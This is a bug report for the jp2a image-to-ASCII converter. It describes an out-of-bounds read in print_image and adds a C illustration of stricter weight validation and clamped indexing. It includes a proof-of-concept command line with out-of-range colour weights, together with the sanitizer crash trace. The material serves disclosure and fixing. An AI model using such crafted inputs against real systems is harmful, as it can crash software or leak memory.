Description:
There is a global-buffer-overflow bug in jp2a/src/image.c line 185, in the print_image function.
This bug will cause an out-of-bounds read vulnerability.
The arguments redweight, greenweight and blueweight are only checked against "Weights RED+GREEN+BLUE must equal 1.0" in src/options.c line 333.
But if I input a huge value for --red while the sum of these three arguments still equals 1.0, the variable pos (src/image.c, line 183) will be larger than the intended value.
Therefore, the value of the expression (invert ? pos : chars - pos) will exceed 256 (the variable ascii_palette is an array with 256 elements), so there is a buffer overflow in the print_image function.
CommandLine: jp2a beauty.jpeg --red=65532 --green=-65531 --blue=0
==63250==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000073724b at pc 0x0000004f1dc2 bp 0x7ffd4fb0e6b0 sp 0x7ffd4fb0e6a8
READ of size 1 at 0x00000073724b thread T0
#0 0x4f1dc1 in print_image /root/Downloads/PoC/jp2a/src/image.c:185:40
#1 0x4f48c3 in decompress /root/Downloads/PoC/jp2a/src/image.c:447:2
#2 0x4eed95 in main /root/Downloads/PoC/jp2a/src/jp2a.c:103:4
#3 0x7f6d9addeb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#4 0x41bc89 in _start (/root/Downloads/PoC/jp2a/src/jp2a+0x41bc89)
Address 0x00000073724b is a wild pointer.
SUMMARY: AddressSanitizer: global-buffer-overflow /root/Downloads/PoC/jp2a/src/image.c:185:40 in print_image
Shadow bytes around the buggy address:
0x0000800dedf0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0000800dee40: f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9 f9 f9
0x0000800dee50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800dee90: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==63250==ABORTING
System Configuration
jp2a 1.0.8
Copyright 2006-2016 Christian Stigen Larsen
Distributed under the GNU General Public License (GPL) v2.
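The following is an added illustration, not jp2a's source code: it reproduces the validation gap the report describes (only the sum of the colour weights is checked) beside a range check on each weight and a clamped palette lookup. The palette string, the CHARS count and the function names (weights_ok_sum_only, weights_ok_strict, palette_index, palette_lookup) are constructed for this example and do not correspond to jp2a's identifiers.

```c
#include <stdio.h>

/* Added example (not jp2a's source): shows why validating only the
 * sum of the colour weights leaves the palette index unbounded, and what
 * a per-weight range check plus a clamped lookup looks like. The palette
 * string and all function names here are constructed for the illustration. */

static const char ascii_palette[] = "   ...',;:clodxkO0KXNWM";
#define CHARS ((int)(sizeof ascii_palette - 1))   /* 23 palette characters */

/* The only constraint described in the report: the three weights must sum to 1.0. */
int weights_ok_sum_only(double r, double g, double b)
{
    double d = r + g + b - 1.0;
    return d > -1e-9 && d < 1e-9;
}

/* Hardened constraint: each weight must be a real number in [0, 1] and the
 * three must still sum to 1.0. Under that rule a weighted 8-bit pixel stays
 * within 0..255, so the derived index cannot leave the palette. */
int weights_ok_strict(double r, double g, double b)
{
    const double w[3] = { r, g, b };
    for (int i = 0; i < 3; i++) {
        if (w[i] != w[i])              /* NaN compares false below, so reject it here */
            return 0;
        if (w[i] < 0.0 || w[i] > 1.0)  /* also rejects +/- infinity */
            return 0;
    }
    return weights_ok_sum_only(r, g, b);
}

/* Weighted intensity mapped to a palette position; 'invert' uses pos directly,
 * otherwise the index is counted from the far end, mirroring the report's
 * (invert ? pos : chars - pos) shape. Constructed formulation, not jp2a's. */
long palette_index(unsigned char red, unsigned char green, unsigned char blue,
                   double r, double g, double b, int invert)
{
    double intensity = red * r + green * g + blue * b;   /* 0..255 only for valid weights */
    long pos = (long)(intensity / 255.0 * (CHARS - 1));
    return invert ? pos : (CHARS - 1) - pos;
}

/* Defence in depth: clamp before indexing so the read can never leave the array,
 * even if a bad weight set slipped past option parsing. */
char palette_lookup(long idx)
{
    if (idx < 0)
        idx = 0;
    if (idx > CHARS - 1)
        idx = CHARS - 1;
    return ascii_palette[idx];
}

int main(void)
{
    /* Weights from the report's command line: they sum to 1.0 but are far outside [0, 1]. */
    double r = 65532.0, g = -65531.0, b = 0.0;
    long idx = palette_index(255, 0, 0, r, g, b, 1);
    printf("sum-only check: %d, strict check: %d\n",
           weights_ok_sum_only(r, g, b), weights_ok_strict(r, g, b));
    printf("index for a pure red pixel: %ld (palette has %d entries)\n", idx, CHARS);
    printf("clamped lookup yields '%c'\n", palette_lookup(idx));
    return 0;
}
```

With the report's weights, weights_ok_sum_only accepts them while weights_ok_strict rejects them, and palette_index produces a position of 1441704 for a pure red pixel against a 23-entry palette, which is the same class of out-of-bounds index the sanitizer trace shows. Rejecting the weights at option-parsing time is the real fix; the clamp in palette_lookup only limits the blast radius if validation is bypassed.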
